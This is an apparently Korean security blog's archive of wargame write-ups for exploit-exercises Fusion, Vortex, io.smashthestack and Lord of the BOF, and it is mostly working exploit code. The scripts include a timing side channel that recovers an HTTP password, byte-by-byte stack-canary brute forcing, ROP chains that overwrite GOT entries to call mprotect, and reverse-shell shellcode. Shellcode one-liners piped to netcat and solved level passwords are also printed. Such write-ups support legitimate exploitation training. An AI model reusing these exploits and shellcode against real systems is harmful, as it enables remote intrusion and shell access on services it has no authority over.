워메.. lob 풀이

워게임/FTZ 2015.10.11 21:42
크리에이티브 커먼즈 라이선스
Creative Commons License

한 3년전에 쓴거같은데 나한테도 없던 풀이문서가 낙현이한테 있어서 받았다 ㄷㄷㄷ

추억돋네


Smashing_the_Lord_Of_the_Bof.pdf


신고

'워게임 > FTZ' 카테고리의 다른 글

워메.. lob 풀이  (0) 2015.10.11

설정

트랙백

댓글

exploit-exercises fusion level04

크리에이티브 커먼즈 라이선스
Creative Commons License


binary base address를 브루트포싱으로 구했는데

지금 생각해보니 ssp 메세지에 메모리덤프가 오는걸 까먹고있었다

이거 이용하면 브루트포싱 필요 X


최초실행시 password = '' 밑에 password='~~~~' 를 주석처리하고 

canary = ''

binary = 0으로 설정하고 실행한뒤

다음에 실행할때 세개 값 확인해서 넣어두면 빠르게 가능

password 알아올때 마지막 글자만 분리한 이유는

왜그런지는 아직 모르겠는데 마지막글자만 느리게 나오고 다른 글자가 나오는경우가 많음

그래도 빈도는 맞는글자가 더 많이 나와서 10번 돌려보고 제일 많이 나온글자로 결정 -> 내 테스트환경에선 이렇게 했을때 false positive 없었음


canary는 메모리릭 방법이 딱히 없어서 내 문서의 세번째에 있는 방법 사용

이후 익스플로잇은 그냥 익스플로잇

alarm(15)때문에 쉘은 뜨는데 15초뒤에 쉘 꺼짐



from cd80 import *
from base64 import b64encode as e
from time import sleep, time
import sys
from select import select
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
tmp_for_elapsed = []
tmp_for_char = []
password = ''
#password = 'R40xiu0Ngy663KGP'
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\
"\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
if not len(password):
    for i in range(0, 15):
        sys.stdout.write("%dth char...[ "%i)
        for j in charset:
            s = makeCon("192.168.81.140", 20004)
            request = ""
            
            request += "GET / HTTP/1.1\r\n"
            request += "Authorization: Basic "
            request += e(password + j)
            request += "\r\n"
            s.send(request)
            start = time()*10000
            s.recv(4096)
            s.recv(4096)
            s.recv(4096)
            tmp_for_elapsed.append((time()*10000-start))
            s.close()
        mintime = sorted(tmp_for_elapsed)[0]
        mintime_idx = tmp_for_elapsed.index(mintime)
        password += charset[mintime_idx]
        sys.stdout.write(password+" ]\n")
        tmp_for_elapsed = []

    print "now trying 10 times for last character..."
    frequency_table = {}
    for i in range(0, 10):

        # all same except : request += e(~~~~~)
        sys.stdout.write("Trying...%d [ "%i)
        for j in charset:
            s = makeCon("192.168.81.140", 20004)
            request = ""
            
            request += "GET / HTTP/1.1\r\n"
            request += "Authorization: Basic "
            request += e("A"*15 + j)
            request += "\r\n"
            s.send(request)
            start = time()*10000
            s.recv(4096)
            s.recv(4096)
            s.recv(4096)
            tmp_for_elapsed.append((time()*10000-start))
            s.close()
        mintime = sorted(tmp_for_elapsed)[0]
        mintime_idx = tmp_for_elapsed.index(mintime)
        sys.stdout.write("%c ]\n"%charset[mintime_idx])
        tmp_for_elapsed = []
        if charset[mintime_idx] in frequency_table:
            frequency_table[charset[mintime_idx]] += 1
        else:
            frequency_table[charset[mintime_idx]] = 1
    password += sorted(frequency_table, key=frequency_table.get, reverse=True)[0]

    print "Final password: %s"%password


#########################
######## stage 2 ########
#########################
def sendpayload(payload):
    recved = ''
    s = makeCon("192.168.81.140", 20004)
    request = ""
    request += "GET / HTTP/1.1\r\n"
    request += "Authorization: Basic "
    request += e(password+payload)
    request += "\r\n\r\n"
    
    s.send(request)
    try:
        recved = s.recv(4096)
    except:
        pass
    try:
        recved += s.recv(4096)
    except:
        pass
    s.close()
    
    return recved
payload = "A"*2032
canary = ''
if not canary:
    print "Getting canary...."
    for a in range(0, 0x100):
        recved = sendpayload(payload + chr(a))
        #print "Trying first byte...0x%02x"%a
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(a)
            break
    print "First byte:\t0x%02x"%a
    for b in range(0, 0x100):
        recved = sendpayload(payload + canary + chr(b))
        #print "Trying second byte...0x%02x"%b
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(b)
            break
    print "Second byte:\t0x%02x"%b
    for c in range(0, 0x100):
        recved = sendpayload(payload + canary + chr(c))
        #print "Trying third byte...0x%02x"%c
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(c)
            break
    print "Third byte:\t0x%02x"%c
    for d in range(0, 0x100):
        recved = sendpayload(payload + canary + chr(d))
        #print "Trying fourth byte...0x%02x"%d
        if recved.find("detected") != -1:
            continue
        else:
            canary += chr(d)
            break
    print "Fourth byte:\t0x%02x"%d
    canary = up(canary)

print "Canary: 0x%08x"%canary

binary = 0
if not binary:
    for i in range(0x1000, 0, -1):

        payload = "A"*2032
        payload += p(canary)
        payload += "AAAABBBBCCCC"+p(0xb7000000+i*0x1000+0x4118)+"EEEEFFFFGGGG"
        payload += p(0xb7000000+i*0x1000+0x2a73)
        #    payload += "AAAA"
        print "Trying...[0x%08x]"%(0xb7000000 + i*0x1000)

        if sendpayload(payload).find("Not Found") != -1:
            print "Found binary imagebase: 0x%08x"%(0xb7000000 + i*0x1000)
            binary = 0xb7000000 + i*0x1000
            break
        #sleep(0.1)

library = binary - 0x1a9000

binary_lea_eax_edx_minus_30 = 0x1af3
binary_popebx_ret = 0x10db
binary_add_ebx_plus_5e5b10c4_eax_popebp_ret = 0x1798

payload = "A"*2032
payload += p(canary)
payload += "AAAABBBBCCCC"+p(binary+0x4118)+"EEEEFFFFGGGG"
#pop edx; ret
payload += p(library+0x2da2c)
# mprotect - calloc + 0x30
payload += p(0x5b2a0)
# lea eax, [edx - 0x30]; ret
payload += p(binary + 0x1af3)
# pop ebx; ret
payload += p(binary + 0x10db)
# binary + 0x4214 = calloc@GOT
payload += p(binary + 0x4214 - 0x5e5b10c4)
# add [ebx+0x5e5b10c4], eax; pop ebp; ret
payload += p(binary+0x1798)
payload += "AAAA" # dummy for pop ebp

#pop ebx; ret -> recover GOT address stored in ebx
payload += p(binary + 0x10db)
payload += p(binary + 0x4118)

# calloc@PLT => call mprotect
payload += p(binary + 0x1080)
# pppr
payload += p(binary + 0x179c)
# bss
payload += p(binary + 0x4000)
payload += p(0x1000)
payload += p(7)

#pop ebx; ret -> recover GOT address stored in ebx
payload += p(binary + 0x10db)
payload += p(binary + 0x4118)

# read@PLT
payload += p(binary + 0xd20)
payload += p(binary+0x4500)
payload += p(0)
payload += p(binary+0x4500)
payload += p(0x500)
payload += p(0)

s = makeCon("192.168.81.140", 20004)
request = ""
request += "GET / HTTP/1.1\r\n"
request += "Authorization: Basic "
request += e(password+payload)
request += "\r\n"
raw_input("send exploit payload> ")
s.send(request)
#try:
    #recved = s.recv(4096)
#except:
#    pass
#try:
#    recved += s.recv(4096)
#except:
#    pass

s.send(shellcode)
s.close()


신고

'워게임 > fusion - exploit_exercises' 카테고리의 다른 글

exploit-exercises fusion level04  (1) 2014.11.03
exploit-exercises fusion level03  (0) 2014.11.01
exploit-exercises fusion level02  (0) 2013.09.29
exploit-exercises fusion level01  (0) 2013.09.29
exploit-exercises fusion level00  (0) 2013.09.28

설정

트랙백

댓글

exploit-exercises fusion level03

크리에이티브 커먼즈 라이선스
Creative Commons License
from cd80 import *
import hmac
import hashlib
import time
s = makeCon("192.168.81.140", 20003)
token = eval(s.recv(4096))
print token

# LHOST=127.0.0.1 LPORT=4321
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\
"\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
pack = p
def p(num):
    packed = pack(num)
    ret = ''
    for i in range(0, 4, 2):
        ret += "\\\\u%02x%02x"%(ord(packed[i]), ord(packed[i+1]))
    return ret

####encode shellcode####
shellcode_encoded = ''
for i in range(0, len(shellcode), 4):
    if len(shellcode[i:]) < 4:
        shellcode += "\x00"*(4-len(shellcode[i:]))
    shellcode_encoded += p(up(shellcode[i:i+4]))

####end of encoing####


##### GOT OVERWRITE & make mprotect(gContents, 0x1000, 7) in bss#####
#####
##### socket -> mprotect
##### setsockopt -> &gContents
#####
#####
payload = p(0x8049a4f) # pop ebx; ret
payload += p(0xaaa9b898) # socket@GOT(0x804bd5c) - 0x5d5b04c4
payload += p(0x8049b4f) # pop eax; add esp, 0x5c; ret
payload += p(0xffffab80) # (mprotect - socket)&0xffffffff
payload += p(0x41414141)*(0x5c/4)
payload += p(0x80493fe) # add [ebx + 0x5d5b04c4], eax; ret
payload += p(0x8048e60) # memcpy@PLT
payload += p(0x804a26d) # pppr
payload += p(0x804bd94) # dest : setsockopt@GOT
payload += p(0x804bdf4) # src : unsigned char *gContents
payload += p(4)
##### construct mprotect(gContents, 0x1000, 7) in bss #####                                 # -1 for page id
memcpy_bytes = [0x8048ae4, 0x8049082, 0x804857a, 0x8048179, 0x80485a9, 0x804857a, 0x80481d4, -1, 
                        0x804bdf6, 0x80481d4, 0x804814c, 0x80481d4, 0x80481d4, 0x8048a08, 0x80481d4, 
                        0x80481d4, 0x80481d4]
memcpy_index = [1, 1, 2, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1]
#0x10 ~ 0xf0
page_id = [0x804814c, 0x8048984, 0x80486c4, 0x8048ae4, 0x8048dac, 0x8048b24, 0x8048e8c, 0x80481a0,
               0x8048d37, 0x8048c5c, 0x8048d77, 0x80481bf, 0x8048a04, 0x8048a24, 0x8048d0c]
bss = 0x804be3c
idx = 0
for i in range(0, 15):
    for j in range(0, len(memcpy_index)):
        payload += p(0x8048e60) # memcpy@PLT
        payload += p(0x804a26d) # pppr
        payload += p(bss+idx)
        if memcpy_bytes[j] == -1:
            payload += p(page_id[i])
        else:
            payload += p(memcpy_bytes[j])
        payload += p(memcpy_index[j])
        idx += memcpy_index[j]
setsockopt_bytes = [0x8048984, 0x804bdad, 0x804857a]
setsockopt_index = [1,1,2]
for i in range(0, len(setsockopt_index)):
    payload += p(0x8048e60)
    payload += p(0x804a26d)
    payload += p(bss+idx)
    payload += p(setsockopt_bytes[i])
    payload += p(setsockopt_index[i])
    idx += setsockopt_index[i]
    
payload += p(0x8049207) # pop ebp; ret
payload += p(bss-4)
payload += p(0x8049431) # leaveret

##### END OF GOT OVERWRITE #####

request = token
request += '\n'
request += '{'
request += '"serverip": "127.0.0.1", '
request += '"title": "'+"a"*(127)+"\\\\u6161"+"A"*31+payload+'", '
request += '"contents": "'+shellcode_encoded
request += '"}//'
nowhash = 0
i=0
start = time.time()
while i <= 0xffffffff:
    nowhash = hmac.new(token, request+p(i), hashlib.sha1).digest()
    if ord(nowhash[0]) == 0 and ord(nowhash[1]) == 0:
        print "checksum done in %d seconds. salt : %d"%(time.time()-start, i)
        break
    if not i % 10000:
        print "Trying...%d [ %d seconds elapsed ]"%(i, time.time()-start)
    i += 1

s.send(request+p(i))
s.close()

신고

'워게임 > fusion - exploit_exercises' 카테고리의 다른 글

exploit-exercises fusion level04  (1) 2014.11.03
exploit-exercises fusion level03  (0) 2014.11.01
exploit-exercises fusion level02  (0) 2013.09.29
exploit-exercises fusion level01  (0) 2013.09.29
exploit-exercises fusion level00  (0) 2013.09.28

설정

트랙백

댓글

vortex10 -> vortex11

워게임/vortex 2014.05.22 16:33
크리에이티브 커먼즈 라이선스
Creative Commons License

http://overthewire.org/wargames/vortex/vortex10.html

숫자를 리스트형태로 주길래 파이썬으로 받아서 C로 넘겨서 시드를 구한 후 파이썬에서 시드를 입력했습니다

solver.c 

#include <stdio.h>
main(){
 int i;
 unsigned long currenttime;
 unsigned long seed = 0;
 unsigned long numbers[20] = {0,};
 currenttime = time(0);
 for(i=0; i<20; i++){
  fflush(0);
  scanf("%d", &numbers[i]);
 }
 
 while(1){
  srand(currenttime+seed);
  for(i=0; i<seed; i++){
   rand();
  }
  for(i=0; i<20; i++){
   if(rand() != numbers[i]){
    break;
   }
   if(i==19){
    printf("%d\n", currenttime+seed);
    exit(0);
   }
  }
  seed++;
 }
}

 

solver.py

#!/usr/bin/env python
import os
from subprocess import Popen, PIPE
from time import sleep
target = Popen("/vortex/vortex10", stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)
arrstring = target.stdout.readline()
print "==========================="
print arrstring
print "==========================="
arrstring = arrstring.split("[")[1]
arrstring = arrstring.split("]")[0]
arrstring = arrstring.split(",")
numbers = []
for num in arrstring[:-1]:
 numbers.append(int(num, 16))
solver = Popen("/tmp/cd80_vortex10/solver", stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)
print "Sleep"
sleep(3)
print "Go"
for i in range(0, 20):
 solver.stdin.write(str(numbers[i])+"\n")
 sleep(0.5)
while 1:
 answer = solver.stdout.readline()
 if len(answer) > 0:
  break
answer = eval(answer)
print "Answer: %x" % answer
from struct import pack
target.stdin.write(pack("<L",answer)+"\n")
target.stdin.write("cat /etc/vortex_pass/vortex11\n")
print "vortex11 pass : " + target.stdout.readline()

 

vortex10@melinda:/tmp/cd80_vortex10$ ./solver.py
===========================
[ 1800a8a3, 6cbe3892, 19e9ffb8, 152d6f5f, 068dc8e7, 2e0e621b, 136c5cd0, 27405a33, 288b2529, 04d5e971, 2f882704, 3b6ecfa6, 27669c6b, 624831c1, 43e4020a, 65aa718d, 268ba818, 2fc72ed5, 299bdde3, 128aba01,]
===========================
Sleep
Go
Answer: 537da917
vortex11 pass : %8sLEszy9
vortex10@melinda:/tmp/cd80_vortex10$ 

 

신고

'워게임 > vortex' 카테고리의 다른 글

vortex10 -> vortex11  (3) 2014.05.22
level0 -> level1  (0) 2013.09.29

설정

트랙백

댓글

level10

크리에이티브 커먼즈 라이선스
Creative Commons License

이번 문제는 다른문제보다 삽질을 좀 많이 한 문제입니다


먼저 소스를 보여드리겠습니다


#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>


int main(int argc, char **argv){

        FILE *fp = fopen("/levels/level10_alt.pass", "r");

        struct {char pass[20], msg_err[20]} pwfile = {{0}};

        char ptr[0];


        if(!fp || argc != 2)

                return -1;


        fread(pwfile.pass, 1, 20, fp);

pwfile.pass[19] = 0;

        ptr[atoi(argv[1])] = 0;

        fread(pwfile.msg_err, 1, 19, fp);

        fclose(fp);


        if(!strcmp(pwfile.pass, argv[1]))

                execl("/bin/sh", "sh", 0);

        else

                puts(pwfile.msg_err);



        return 0;

} 

/levels/level10_alt.pass 에 level10 계정의 읽기권한이 없기때문에

gdb로 이 프로그램을 그대로 실행 할 경우 fopen이 실패합니다

소스에서 ptr[atoi(argv[1])] = 0; <- 이부분이 프로그램의도와는 전혀 상관없는 부분이기 때문에

이부분을 이용해서 푸는게 의도인건 알았는데 어디를 덮어씌워야할지 난감했습니다


먼저 메모리 레이아웃을 말씀드리면

ptr    = ebp - 0x58

pwfile.pass    ebp - 0x48

pwfile.msg_err    ebp - 0x34

이런식으로 위치합니다

따라서 ptr[16] = 0 을 하면 pwfile.pass는 공백으로 만들수 있지만 argv[1]이 "16"이기 때문에 strcmp는 어쨌든 실패합니다


그런데 strcmp가 실패할경우 pwfile.msg_err를 출력합니다

strcmp가 실패하면 그냥 단순하게 puts("ACCESS DENIED..."); 를 출력하면되는데

저 메세지를 굳이 파일에 넣는단건

pwfile.msg_err = pwfile.pass 가 되게 해 pass를 출력하게 하면 된다는 뜻입니다


원래 삽질을 소스를 복사해서 컴파일해 하고 있었는데

원본바이너리랑 차이가 좀 심해서

원본바이너리를 복사해 hexedit으로 fopen 인자로 들어가는 문자열을 수정해서 테스트 해봤습니다



그런데 디버깅하면서 보니 fopen의 리턴값이 힙영역 주소가 나와서

힙영역 메모리를 덤프떠보니 pwfile.pass와 pwfile.msg_err 내용을 가르키는 포인터들이 있단걸 확인했습니다




(gdb) disp/i $pc

1: x/i $pc

=> 0x8048575 <main+177>: call   0x80483f8 <fread@plt>

(gdb) x/50wx 0x804a00c

0x804a00c: 0xb7fde014 0xb7fde025 0xb7fde000 0xb7fde000

0x804a01c: 0xb7fde000 0xb7fde000 0xb7fde000 0xb7fdf000

0x804a02c: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a03c: 0xb7fd0580 0x00000007 0x00000000 0x00000000

0x804a04c: 0x00000000 0x0804a0a0 0xffffffff 0xffffffff

0x804a05c: 0x00000000 0x0804a0ac 0x00000000 0x00000000

0x804a06c: 0x00000000 0xffffffff 0x00000000 0x00000000

0x804a07c: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a08c: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a09c: 0xb7fcf9e0 0x00000000 0x00000000 0x00000000

0x804a0ac: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a0bc: 0x00000000 0x00000000 0x00000000 0x00000000

0x804a0cc: 0x00000000 0x00000000

(gdb) x/s 0xb7fde014

0xb7fde014: "ACCESS DENIED...\n"

(gdb) x/s 0xb7fde000

0xb7fde000: "passwordpasswordtestACCESS DENIED...\n"

(gdb) 

0xb7fde014 에서 최하위바이트만 0으로 맞춰주면

패스워드가 그대로 있습니다


io.smashthestack.org 가 ASLR이 꺼져있기때문에

ptr의 주소는 항상 일정합니다

argv[1]에 따라 main함수의 ebp가 바뀌니 일단 없이 넣어주고 argv[1]에 들어가야되는 숫자의 자리수를 확인해 다시 넣어준 뒤의 ebp를 확인합니다

level10@io:/tmp/cd$ gdb -q level10

Reading symbols from /tmp/cd/level10...(no debugging symbols found)...done.

(gdb) b main

Breakpoint 1 at 0x80484c8

(gdb) r

Starting program: /tmp/cd/level10 


Breakpoint 1, 0x080484c8 in main ()

(gdb) i r ebp

ebp            0xbffffcb8 0xbffffcb8

(gdb) p $ebp - 0x58

$1 = (void *) 0xbffffc60

(gdb) p 0x804a00c - 0xbffffc60

$2 = 1208263596

(gdb) r 1208263596

The program being debugged has been started already.

Start it from the beginning? (y or n) y

Starting program: /tmp/cd/level10 1208263596


Breakpoint 1, 0x080484c8 in main ()

(gdb) i r ebp

ebp            0xbffffca8 0xbffffca8

(gdb) p $ebp - 0x58

$3 = (void *) 0xbffffc50

(gdb) p 0x804a00c - 0xbffffc50

$4 = 1208263612

(gdb)


level10@io:/tmp/cd$ /levels/level10 1208263612

AverYloNgPassword!!

level10@io:/tmp/cd$ 

쉘에서 느낌표를 넣어주려고 했는데 잘 안돼서 파일에 넣고 argv에 넣었습니다


level10@io:/tmp/cd$ cat > ./pass

AverYloNgPassword!!

level10@io:/tmp/cd$ /levels/level10 $(cat ./pass)

sh-4.2$ whoami

level11

sh-4.2$


신고

'워게임 > io.smashthestack.org' 카테고리의 다른 글

level10  (0) 2014.02.02
level9  (0) 2013.08.25
level8  (0) 2013.08.25
level7  (0) 2013.08.24
level6  (0) 2013.08.24
level1  (0) 2013.07.14

설정

트랙백

댓글

dark_stone -> cruel

워게임/Lord Of the BOF 2013.10.15 14:42
크리에이티브 커먼즈 라이선스
Creative Commons License

 

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

 

스택에 있는 값을 인자로 사용해 execve함수를 호출했습니다

 

 

[dark_stone@Fedora_2ndFloor ~]$ ./cruel $(perl -e 'print "\xf9\x84\x04\x08"x77, "\xbc\x2a\x83\x00"')
[dark_stone@Fedora_2ndFloor ~]$ /tmp/cruel_pwned -p
cruel_pwned-3.00$ whoami
cruel
cruel_pwned-3.00$ my-pass
euid = 501
come on, come over
cruel_pwned-3.00$  

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

evil_wiard -> dark_stone

워게임/Lord Of the BOF 2013.10.15 14:14
크리에이티브 커먼즈 라이선스
Creative Commons License

 

 

이번 문제도 저번문제처럼 .bss에 RTL 페이로드를 복사해 풀려 했으나

execve함수에서 자꾸 Bad Address에러가 나서 실패했습니다

원인에 대한 분석을 언제할진 모르겠지만 하게되면 블로그에 올리겠습니다

 

그래서 printf -> system 으로 got overwrite 해 풀었습니다

 

풀면서 노트한 내용입니다

 

0x8048408 printf@PLT
0x804984c printf@GOT
0x8048438 strcpy@PLT
0x80484f3 ppr

0x007507c0 system@LIBC
0x00833603 "/bin/sh"@LIBC

strcpy( 0x8049850, "0x007507c0" )


0x80482b4 0xc0 0x8049850 \x4c\x98\x04\x08\xd0\x84\x04\x08
0x8048364 0x07 0x8049851 \x4d\x98\x04\x08\x64\x83\x04\x08
0x80484d0 0x75 0x8049852 \x4e\x98\x04\x08\xb4\x82\x04\x08
0x804833c 0x00 0x8049853 \x4f\x98\x04\x08\x3c\x83\x04\x08

strcpy + ppr \x38\x84\x04\x08\xf3\x84\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x4c\x98\x04\x08\xd0\x84\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4d\x98\x04\x08\x64\x83\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4e\x98\x04\x08\xb4\x82\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4f\x98\x04\x08\x3c\x83\x04\x08

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

hell_fire -> evil_wizards

워게임/Lord Of the BOF 2013.10.12 11:38
크리에이티브 커먼즈 라이선스
Creative Commons License

 

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - evil_wizard
 - Local BOF on Fedora Core 3
 - hint : GOT overwriting
*/

// magic potion for you
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
int main(int argc, char *argv[])
{
 char buffer[256];
 char saved_sfp[4];
 int length;

 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }

 // for disturbance RET sleding
 length = strlen(argv[1]);
  
        // healing potion for you
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, argv[1]);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$ 

 

아래는 원래 텍스트가 길어서 짤려서 보기좋게 개행했습니다

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard $(perl -e 'print "A"x268,
"\xe8\x86\x04\x08", "A"x88, "\xac\x98\x04\x08", "\xe9\x86\
x04\x08"x100, "\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\
x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x0
8\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\
x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x0
4\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\
x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81
\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x
08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba
\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x
04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08", "\xe8\x86\x04\x08"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAH³.AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA¬....................................................................................鄄...............O°,O±TO²ȂO³ׄO¸HO¹Oº#O»ׄ脄
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$

 

 

힌트는 got overwrite라고 돼있는데 어떻게 해야할질 모르겠어서

.bss에 system함수 주소와 /bin/sh 문자열 주소를 복사한 후 fake ebp해 풀었습니다

 

 

아래는 문제를 풀면서 작성한 노트입니다

 

/bin/sh  0x833603
system  0x7507c0
.bss  0x080498b0
strcpy@plt 0x08048494
ppr  0x0804854f
leaveret 0x080486e8
fakeebp  .bss-4 ( 0x080498ac )


0x0804852c 0xc0 0x080498b0 \xb0\x98\x04\x08\x2c\x85\x04\x08
0x08048154 0x07 0x080498b1 \xb1\x98\x04\x08\x54\x81\x04\x08
0x080482c8 0x75 0x080498b2 \xb2\x98\x04\x08\xc8\x82\x04\x08
0x080484d7 0x00 0x080498b3 \xb3\x98\x04\x08\xd7\x84\x04\x08

0x08048148 0x03 0x080498b8 \xb8\x98\x04\x08\x48\x81\x04\x08
0x080481e0 0x36 0x080498b9 \xb9\x98\x04\x08\xe0\x81\x04\x08
0x08048523 0x83 0x080498ba \xba\x98\x04\x08\x23\x85\x04\x08
0x080484d7 0x00 0x080498bb \xbb\x98\x04\x08\xd7\x84\x04\x08

strcpy + plt \x94\x84\x04\x08\x4f\x85\x04\x08

\xb0\x98\x04\x08\x2c\x85\x04\x08
\xb1\x98\x04\x08\x54\x81\x04\x08
\xb2\x98\x04\x08\xc8\x82\x04\x08
\xb3\x98\x04\x08\xd7\x84\x04\x08
\xb8\x98\x04\x08\x48\x81\x04\x08
\xb9\x98\x04\x08\xe0\x81\x04\x08
\xba\x98\x04\x08\x23\x85\x04\x08
\xbb\x98\x04\x08\xd7\x84\x04\x08

\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08

 

 

신고

'워게임 > Lord Of the BOF' 카테고리의 다른 글

dark_stone -> cruel  (0) 2013.10.15
evil_wiard -> dark_stone  (0) 2013.10.15
hell_fire -> evil_wizards  (1) 2013.10.12
dark_eyes -> hell_fire  (0) 2013.10.10

설정

트랙백

댓글

dark_eyes -> hell_fire

워게임/Lord Of the BOF 2013.10.10 21:48
크리에이티브 커먼즈 라이선스
Creative Commons License

 

[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/

#include <stdio.h>

int main()
{
 char buffer[256];
 char saved_sfp[4];
 char temp[1024];
 
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 fflush(stdout);

 // give me a food
 fgets(temp, 1024, stdin);
  
 // save sfp
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 strcpy(buffer, temp);

 // restore sfp
 memcpy(buffer+264, saved_sfp, 4);

 printf("%s\n", buffer);

소스입니다

fgets를 사용하기때문에 stdin으로 fake ebp해 mprotect로 rwx권한을 줘 쉘코드를 실행했습니다

 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x38\x86\x04\x08", "B"x88, "\xf0\xe1\xff\xf6", "\x38\x86\x04\x08", "A"x132, "\x70\x46\x71\x00", "\x58\xe2\xff\xf6", "\x00\xe0\xff\xf6", "\x00\x08\x00\x00", "\x07\x00\x00\x00", "\x90"x300, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"';cat)|nc localhost 7777
hell_fire : What's this smell?
you :

my-pass
euid = 503
sign me up

 

